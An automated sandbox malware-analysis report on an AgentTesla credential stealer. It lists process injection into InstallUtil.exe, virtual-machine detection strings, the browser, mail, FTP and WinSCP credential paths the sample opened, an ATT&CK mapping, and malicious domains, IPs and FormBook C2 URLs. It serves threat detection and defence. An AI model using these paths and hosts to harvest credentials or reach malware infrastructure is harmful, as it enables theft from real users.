Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594966	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 594750	Jump to behavior

Source: umVoLahqZn.exe, 00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmp, umVoLahqZn.exe, 00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, umVoLahqZn.exe, 00000000.00000002.2713909861.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, umVoLahqZn.exe, 00000000.00000002.2726127716.0000000005A70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: VBoxTray
Source: umVoLahqZn.exe, 00000000.00000002.2713909861.00000000033E1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $]q#SOFTWARE\VMware, Inc.\VMware VGAuth
Source: InstallUtil.exe, 00000004.00000002.3315667697.0000000006532000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: umVoLahqZn.exe, 00000000.00000002.2726127716.0000000005A70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth

Source: C:\Users\user\Desktop\umVoLahqZn.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\umVoLahqZn.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\umVoLahqZn.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\umVoLahqZn.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\umVoLahqZn.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\umVoLahqZn.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42C000	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42E000	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 11EA008	Jump to behavior

Source: C:\Users\user\Desktop\umVoLahqZn.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

Jump to behavior

Source: C:\Users\user\Desktop\umVoLahqZn.exe	Queries volume information: C:\Users\user\Desktop\umVoLahqZn.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\umVoLahqZn.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\umVoLahqZn.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0.2.umVoLahqZn.exe.4588612.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.45b20f2.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.4659420.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.4588612.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.462f142.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.45dbbc2.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.45dbbc2.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.45b20f2.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.462f142.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2724787687.000000000455E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3309819183.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2968, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2968, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0.2.umVoLahqZn.exe.4588612.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.45b20f2.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.4659420.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.4588612.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.462f142.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.45dbbc2.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.45dbbc2.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.45b20f2.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.umVoLahqZn.exe.462f142.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2724787687.000000000455E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.3309819183.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2968, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Valid Accounts	1 Valid Accounts	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	311 Process Injection	12 Software Packing	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	141 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	311 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
umVoLahqZn.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
umVoLahqZn.exe	100%	Avira	TR/AD.Nekark.lkpsl
umVoLahqZn.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://ftp.aminhacorretora.com.br	100%	Avira URL Cloud	malware
http://ns.adobe.c0/	0%	Avira URL Cloud	safe
http://aminhacorretora.com.br	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
aminhacorretora.com.br	162.241.203.30	true	true		unknown
ftp.aminhacorretora.com.br	unknown	unknown	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://aminhacorretora.com.br	InstallUtil.exe, 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://ftp.aminhacorretora.com.br	InstallUtil.exe, 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	InstallUtil.exe, 00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ns.adobe.c0/	umVoLahqZn.exe, 00000000.00000002.2727525135.0000000006761000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.241.203.30	aminhacorretora.com.br	United States		26337	OIS1US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1569279
Start date and time:	2024-12-05 17:17:00 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	umVoLahqZn.exe renamed because original name is a hash value
Original Sample Name:	325f8b7cb5f2bd3c93b6052bc44407c878feef638ed6303b9385185b05ac3f67.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/4@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 136 Number of non-executed functions: 27
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: umVoLahqZn.exe

Simulations

Behavior and APIs

Time	Type	Description
11:17:54	API Interceptor	202x Sleep call for process: umVoLahqZn.exe modified
11:19:03	API Interceptor	16398x Sleep call for process: InstallUtil.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
162.241.203.30	S23UhdW5DH.exe	Get hash	malicious	LummaC, Glupteba, SmokeLoader, Socks5Systemz, Stealc	Browse	nossoplayer.me/admin/
	RjGM2z2Z3gVHbRl.exe	Get hash	malicious	FormBook	Browse	www.enriquepimentel.site/eauu/?DZDL=WHu5pNat8uHfzRxaB9vtQ4eIh6FN4j/LlAnIasWF7xCzNp7gljTYY7GdEKRxmLt8YdbcyrQMPNW8Q0wryNhuApS+Kh6rZS0ucw==&XJE=v0GXajs0Cfa
	PI5102295.exe	Get hash	malicious	FormBook	Browse	www.enriquepimentel.site/k056/?4hzh=z6Y8Z0&a8GP-0=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlL553wQlR/hos/LA==
	SecuriteInfo.com.Trojan.GenericKD.61688138.7209.1529.exe	Get hash	malicious	FormBook	Browse	www.enriquepimentel.site/k056/?bH=ZR2t9tZxXpFp&j48x=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlL58jtUiF/uIknLA==
	ZsFMADRfZB.exe	Get hash	malicious	FormBook	Browse	www.enriquepimentel.site/k056/?2dyL8P=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlO3cbHe0QClKYeKQ==&I6Ah=eFQ8RbYHBTF0_Z
	SecuriteInfo.com.Trojan.DownLoaderNET.447.13310.17565.exe	Get hash	malicious	FormBook	Browse	www.enriquepimentel.site/k056/?t0GX=kdo4s&9rW=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlOwcbsUXIBubYeARc4v5180oiw
	SecuriteInfo.com.Trojan.DownloaderNET.345.11377.31950.exe	Get hash	malicious	FormBook	Browse	www.enriquepimentel.site/k056/?9ro=ccGOjcIBjqLbOnXRe7lLB+dwYu/ZygjJcVyaF0ldps2G+u8kq0WLxTvmdwIIE+s4Lc2Gt50Y2p8GEt6zpNlOwcbsUXIBubYeARc4v5180oiw&q2ML=zTqLQN
	SKMB610952.js	Get hash	malicious	FormBook	Browse	www.enriquepimentel.site/k056/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
aminhacorretora.com.br	Hangarskibenes.exe	Get hash	malicious	GuLoader	Browse	162.241.203.30

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OIS1US	tTXQS6DONV.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	162.241.203.30
	dY1ZxYJOz7.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	162.241.203.30
	i9QKJCpVZJ.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	162.241.203.30
	Pp7OXMFwqhXKx5Y.exe	Get hash	malicious	FormBook	Browse	192.185.147.100
	Documents.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	192.185.147.100
	https://app.smartsheet.com/b/form/9141bdd4d7da45789170a7064a677627	Get hash	malicious	HTMLPhisher	Browse	162.241.71.126
	http://www.im-creator.com/viewer/vbid-2a496caa-iwgbu2zx/vbid-f9637b78-lok1anrm	Get hash	malicious	Unknown	Browse	162.241.71.126
	https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com	Get hash	malicious	Unknown	Browse	162.241.71.126
	Isabella County Emergency Management-protected.pdf	Get hash	malicious	HTMLPhisher	Browse	162.241.71.126
	Isabella County Emergency Management-protected.pdf	Get hash	malicious	Unknown	Browse	162.241.71.126

Process:	C:\Users\user\Desktop\umVoLahqZn.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLV1qE4x84qpE4KlKDE4KhKiKhIE4KnKIE4oKNzKoZAE4Kze0E4j:Mp1qHxv2HKlYHKh3oIHKntHo6hAHKzea
MD5:	8275047EA04782E18195CE5F2F076225
SHA1:	86FE553781E50EE2493A6D54A2F329FF94AD0DEE
SHA-256:	302DE184C80A778557AA7F09DDCAB59FED5712B6BC617FDEAFE1E004021FFDDC
SHA-512:	4F7B9BE379C98D5E9609D46FC0B473C66A977C3A081C60872CB8FE344C2785A285E9D9019D49515A6DC5D1E6EFF2D8DD5E5BA49086AF24F8A2F50E6B9EBE588B
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

